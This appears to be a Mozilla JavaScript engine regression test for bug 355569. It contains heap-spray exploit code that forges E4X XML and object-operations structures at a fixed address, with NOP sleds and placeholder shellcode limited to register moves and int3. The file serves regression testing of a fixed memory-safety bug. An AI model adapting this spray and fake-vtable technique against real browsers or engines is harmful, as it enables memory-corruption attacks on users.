1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
|
/* -*- indent-tabs-mode: nil; js-indent-level: 4 -*- */
/* This Source Code Form is subject to the terms of the Mozilla Public
* License, v. 2.0. If a copy of the MPL was not distributed with this
* file, You can obtain one at http://mozilla.org/MPL/2.0/. */
var BUGNUMBER = 355569;
var actual = '';
var expect = '';
var summary = '';
printBugNumber (BUGNUMBER);
printStatus (summary);
var targetAddress = 0x12030010;
var sprayParams = {
chunkSize: 16 * 1024 * 1024,
chunkCount: 16,
chunkMarker: 0xdeadface,
chunkAlign: 0x1000,
reservedSize: 1024
};
function makeExploitCode() {
/* mov eax, 0xdeadfeed; mov ebx, eax; mov ecx, eax; mov edx, eax; int3 */
return "\uEDB8\uADFE\u89DE\u89C3\u89C1\uCCC2";
}
/*==========================================================================*/
/*==========================================================================*/
function packData(template, A) {
var n = 0, result = "", vl;
for(var i = 0; i < template.length; i++) {
var ch = template.charAt(i);
if(ch == "s" || ch == "S") {
vl = A[n++] >>> 0; result += String.fromCharCode(vl & 0xffff);
} else if(ch == "l" || ch == "L") { // XXX endian
vl = A[n++] >>> 0; result += String.fromCharCode(vl & 0xffff, vl >> 16);
} else if(ch == "=") {
result += String(A[n++]);
}
}
return result;
}
function buildStructure(worker, address) {
var offs = {}, result = "", context = {
append: function(k, v) { offs[k] = result.length * 2; result += v; },
address: function(k) { return address + ((k && offs[k]) || 0); }
}; worker(context); result = ""; worker(context); return result;
}
function repeatToLength(s, L) {
if(L <= s.length) { return s.substring(0, L); }
while(s.length <= L/2) { s += s; }
return s + s.substring(0, L - s.length);
}
function sprayData(data, params, rooter) {
var marker = packData("L", [ params.chunkMarker ]);
data += repeatToLength("\u9090", params.chunkAlign / 2 - data.length);
data = repeatToLength(data, (params.chunkSize - params.reservedSize) / 2);
for(var i = 0; i < params.chunkCount; i++) {
rooter[i] = marker + data + i;
}
}
function T_JSObject(map, slots)
{ return packData("LL", arguments); }
function T_JSObjectMap(nrefs, ops, nslots, freeslot)
{ return packData("LLLL", arguments); }
function T_JSObjectOps(
newObjectMap, destroyObjectMap, lookupProperty, defineProperty,
getProperty, setProperty, getAttributes, setAttributes,
deleteProperty, defaultValue, enumerate, checkAccess,
thisObject, dropProperty, call, construct,
xdrObject, hasInstance, setProto, setParent,
mark, clear, getRequiredSlot, setRequiredSlot
) { return packData("LLLLLLLL LLLLLLLL LLLLLLLL", arguments); }
function T_JSXML_LIST(
object, domnode, parent, name, xml_class, xml_flags,
kids_length, kids_capacity, kids_vector, kids_cursors,
xml_target, xml_targetprop
) { return packData("LLLLSS LLLL LL", arguments); }
function T_JSXML_ELEMENT(
object, domnode, parent, name, xml_class, xml_flags,
kids_length, kids_capacity, kids_vector, kids_cursors,
nses_length, nses_capacity, nses_vector, nses_cursors,
atrs_length, atrs_capacity, atrs_vector, atrs_cursors
) { return packData("LLLLSS LLLL LLLL LLLL", arguments); }
/*==========================================================================*/
/*==========================================================================*/
function makeExploitData(address) {
return buildStructure(function(ctx) {
ctx.append("xml-list",
T_JSXML_LIST(0, 0, 0, 0, 0, 0, 1, 0, ctx.address("xml-kids-vector"), 0, 0, 0));
ctx.append("xml-kids-vector",
packData("L", [ ctx.address("xml-element") ]));
ctx.append("xml-element",
T_JSXML_ELEMENT(ctx.address("object"), 0, 0, 0, 1, 0, 0, 0, 0, 0, /*c*/ 0, 0, 0, 0, /*d*/ 0, 0, 0, 0));
ctx.append("object",
T_JSObject(ctx.address("object-map"), 0));
ctx.append("object-map",
T_JSObjectMap(0, ctx.address("object-ops"), 0, 0));
ctx.append("object-ops",
T_JSObjectOps(0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, ctx.address("exploit-code"), 0));
ctx.append("exploit-code",
makeExploitCode(ctx));
}, address);
}
function exploit() {
sprayData(makeExploitData(targetAddress), sprayParams, this.rooter = {});
var numobj = new Number(targetAddress >> 1);
printStatus("probably not exploitable");
}
try
{
exploit();
}
catch(ex)
{
}
reportCompare(expect, actual);
|